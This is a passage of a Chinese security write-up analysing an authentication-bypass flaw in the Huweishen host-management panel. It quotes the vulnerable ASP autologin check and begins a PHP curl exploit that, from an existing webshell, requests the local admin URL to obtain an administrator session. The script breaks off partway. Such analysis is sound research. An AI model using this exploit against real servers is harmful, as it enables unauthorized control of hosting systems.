护卫神mysql提权_护卫神主机大师提权漏洞利用分析

article/2025/10/3 12:27:10

*本文原创作者：Freedom，本文属FreeBuf原创奖励计划，未经许可禁止转载

0x01 前言

护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin)，并可在线开设主机、SQL Server和MySQL；Web方式管理，拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神14年安全防护经验，严格限制每个站点独立权限，彻底阻挡跨站入侵。但这套系统真的像描述的那么安全么？，由于某次安全测试遇到该系统，遂对该系统进行分析。本文记录了分析过程中的一些记录和问题。

0x02 代码分析

先看看装好后的软件界面,可以看到一些常见的主机操作功能。其中网站管理引起了我的注意，点开瞅瞅

点开之后就直接进去了,WTF?

从逻辑流程来看这里很明显有问题，撸开代码看看怎么验证的。虚拟主机管理系统运行在6588端口。且采用asp语言开发。程序路径为x:\HwsHostMaster\host\web\下，且默认为system权限运行。

/admin/index.asp

Dim strIp

strIp = Request.ServerVariables("local_addr")

Dim strAuto

strAuto = LCase(Trim(Request.QueryString("f")))

If (strIp = "::1" Or strIp = "127.0.0.1") And strAuto = "autologin" Then

'获取管理用户登录

Dim sql,rs

call conn_open()

Set rs = Server.CreateObject("Adodb.Recordset")

sql = "select top 1 * from [huweishen_Admin]"

rs.Open sql,conn,1,1

if rs.RecordCount = 0 then

Session("admin")= "autologin"

else

Session("admin") = rs("username")

end if

rs.Close

Session.Timeout =600

AddLog Session("admin"), 1, "控制台直接登录管理中心"

Response.Redirect "index.asp"

End If

代码乍一看好像没啥问题，但是开发者疏忽了一个问题，第９行判断来源ip是否为本地访问，strIp变量来自Request.ServerVariables("local_addr") ，如果为本地访问且strAuto=autologin则直接登入系统，无需账号密码验证，这就出现一个问题了，开发者未考虑内部用户是否合法，如果我获取到一个低权限的webshell、那就相当于获取到一个本地身份了。那么我就可以直接访问到虚拟主机管理后台了。那么就可以为所欲为了。

0x03 利用方法

本漏洞利用前提是已经获取到虚拟主机上的一个webshell，其次在通过以下脚本获取cookie即可进入虚拟主机管理后台。<?php

function httpGet() {

$url = '[http://127.0.0.1:6588/admin/index.asp?f=autologin](http://127.0.0.1:6588/admin/index.asp?f=autologin)';

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_HEADER, TRUE); //表示需要response header

curl_setopt($ch, CURLOPT_NOBODY, TRUE); //表示需要response body

curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, FALSE);

curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);

curl_setopt($ch, CURLOPT_TIMEOUT, 120);